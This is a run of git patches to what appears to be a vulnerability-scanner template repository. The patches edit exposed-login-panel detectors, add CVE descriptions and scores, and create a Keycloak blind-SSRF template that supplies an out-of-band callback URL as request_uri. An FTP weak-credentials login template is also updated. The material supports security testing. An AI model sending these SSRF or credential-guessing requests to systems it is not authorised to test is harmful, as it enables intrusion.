changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/dericam-login.yaml b/exposed-panels/dericam-login.yaml index eeb190eeec..ff62ebc226 100644 --- a/exposed-panels/dericam-login.yaml +++ b/exposed-panels/dericam-login.yaml @@ -4,10 +4,10 @@ info: name: Dericam Login author: dhiyaneshDk severity: info - tags: panel reference: https://www.exploit-db.com/ghdb/7354 metadata: shodan: 'http.title:"Dericam"' + tags: panel requests: - method: GET From 158d44d9050896c7a044dd11c46d88c5121ba611 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 16:50:22 +0530 Subject: [PATCH 2972/4083] Update open-game-panel.yaml --- exposed-panels/open-game-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml index 8b75e5b1a6..ee098682d0 100644 --- a/exposed-panels/open-game-panel.yaml +++ b/exposed-panels/open-game-panel.yaml @@ -4,10 +4,10 @@ info: name: Open Game Panel author: dhiyaneshDk severity: info - tags: panel reference: https://www.exploit-db.com/ghdb/7418 metadata: shodan: 'http.title:"Open Game Panel"' + tags: panel requests: - method: GET From 3e32dd05923920146c2b90c24108ad372d44a612 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 16:51:31 +0530 Subject: [PATCH 2973/4083] Update project-insight-login.yaml --- exposed-panels/project-insight-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/project-insight-login.yaml b/exposed-panels/project-insight-login.yaml index 4f171ac7a5..7b46bccaa3 100644 --- a/exposed-panels/project-insight-login.yaml +++ b/exposed-panels/project-insight-login.yaml @@ -4,10 +4,10 @@ info: name: Project Insight - Login author: dhiyaneshDk severity: info - tags: panel reference: https://www.exploit-db.com/ghdb/7413 metadata: shodan: 'http.title:"Project Insight - Login"' + tags: panel requests: - method: GET From 4263218cce3dc8739f5b258efbc1a5af1b212e8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 16:53:07 +0530 Subject: [PATCH 2974/4083] Update squirrelmail-login.yaml --- exposed-panels/squirrelmail-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/squirrelmail-login.yaml b/exposed-panels/squirrelmail-login.yaml index 2833af3cee..64716573ef 100644 --- a/exposed-panels/squirrelmail-login.yaml +++ b/exposed-panels/squirrelmail-login.yaml @@ -4,10 +4,10 @@ info: name: SquirrelMail - Login author: dhiyaneshDk severity: info - tags: panel reference: https://www.exploit-db.com/ghdb/7407 metadata: shodan: 'http.title:"SquirrelMail - Login"' + tags: panel requests: - method: GET From 8032e6fb3d3c549365932ebdddb37ba394bf5bdb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 16:54:39 +0530 Subject: [PATCH 2975/4083] Update zimbra-web-client.yaml --- exposed-panels/zimbra-web-client.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/zimbra-web-client.yaml b/exposed-panels/zimbra-web-client.yaml index be640f3516..121f98e6b7 100644 --- a/exposed-panels/zimbra-web-client.yaml +++ b/exposed-panels/zimbra-web-client.yaml @@ -1,13 +1,13 @@ id: zimbra-web-client info: - name: Zimbra Web Client Sign In + name: Zimbra Web Client - Sign In author: dhiyaneshDk severity: info - tags: panel reference: https://www.exploit-db.com/ghdb/7409 metadata: shodan: 'http.title:"Zimbra Web Client Sign In"' + tags: panel requests: - method: GET From dfc4a64fdcb13fc41e790c52aa63b9c88df4c16d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 11:26:16 +0000 Subject: [PATCH 2976/4083] Auto Generated CVE annotations [Sun Oct 17 11:26:16 UTC 2021] :robot: --- cves/2015/CVE-2015-4694.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index c273f16a80..97b8256f1d 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -7,6 +7,11 @@ info: description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. reference: https://wpscan.com/vulnerability/8047 tags: lfi,wordpress,cve,cve2015,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2015-4694 + cwe-id: CWE-22 requests: - method: GET From c1b42bcc55f74d684577a841e80d95d949ae4715 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:50:52 +0300 Subject: [PATCH 2977/4083] Add description --- vulnerabilities/other/comtrend-password-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml index d45499f302..1764bf1d74 100644 --- a/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml @@ -4,6 +4,7 @@ info: name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution author: geeknik severity: high + description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. reference: https://www.exploit-db.com/exploits/16275 tags: router,exposure,iot From 0fd1574fe272bf58198d918c8429a5a001571bad Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:52:26 +0300 Subject: [PATCH 2978/4083] Add description --- vulnerabilities/other/ewebs-arbitrary-file-reading.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index e83d14ce2c..60ae8e5789 100644 --- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -4,6 +4,7 @@ info: name: EWEBS casmain.xgi arbitrary file reading vulnerability author: pikpikcu severity: high + description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter. reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html tags: ewebs,lfi From 087bbd22633e4646fd1270c4fc53bc72272fd810 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 17 Oct 2021 15:54:19 +0300 Subject: [PATCH 2979/4083] Add description --- vulnerabilities/other/homeautomation-v3-openredirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index 9388597d8d..d41f1c89fb 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -4,6 +4,7 @@ info: name: HomeAutomation v3.3.2 Open Redirect author: 0x_Akoko severity: medium + description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect From 9c8d006dbe97043c4f85c07c24e9d9109e8b6bc0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 21:29:45 +0530 Subject: [PATCH 2980/4083] Create CVE-2020-10770.yaml --- cves/2020/CVE-2020-10770.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2020/CVE-2020-10770.yaml diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml new file mode 100644 index 0000000000..745f75348a --- /dev/null +++ b/cves/2020/CVE-2020-10770.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-10770 + +info: + name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) + author: dhiyaneshDk + severity: + description: + reference: + - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/50405 + tags: keycloak,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From a9eca98f7f78fc4d6acac4cb1a58d52a085d880d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 21:31:55 +0530 Subject: [PATCH 2981/4083] Update CVE-2020-10770.yaml --- cves/2020/CVE-2020-10770.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml index 745f75348a..80148d8028 100644 --- a/cves/2020/CVE-2020-10770.yaml +++ b/cves/2020/CVE-2020-10770.yaml @@ -3,8 +3,8 @@ id: CVE-2020-10770 info: name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) author: dhiyaneshDk - severity: - description: + severity: medium + description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. reference: - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/50405 From e8218febf5a29eca2e90c2dbc036618eb114fa99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 16:03:20 +0000 Subject: [PATCH 2982/4083] Auto Generated CVE annotations [Sun Oct 17 16:03:20 UTC 2021] :robot: --- cves/2020/CVE-2020-10770.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml index 80148d8028..31d08fdaa4 100644 --- a/cves/2020/CVE-2020-10770.yaml +++ b/cves/2020/CVE-2020-10770.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/50405 tags: keycloak,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.30 + cve-id: CVE-2020-10770 + cwe-id: CWE-601 requests: - method: GET From 6aeaf22c914665d2d2b033ce7d7bbe292805aacf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 21:40:07 +0530 Subject: [PATCH 2983/4083] Update ftp-weak-credentials.yaml --- network/ftp-weak-credentials.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index d3d5380725..57eb4e53ac 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -14,6 +14,7 @@ network: - "{{Hostname}}:21" - "{{Hostname}}" + stop-at-first-match: true payloads: username: - admin @@ -32,4 +33,4 @@ network: matchers: - type: word words: - - "230" \ No newline at end of file + - "230 Login successful" From 5a0b62b8f574ffcc9fee72afa5b71b3ec4b7a141 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 16:10:43 +0000 Subject: [PATCH 2984/4083] Auto Generated Templates Stats [Sun Oct 17 16:10:43 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1766 +++++++++++++++++++++--------------------- TOP-10.md | 12 +- 3 files changed, 890 insertions(+), 890 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4bed7d43d2..b3ed1986da 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"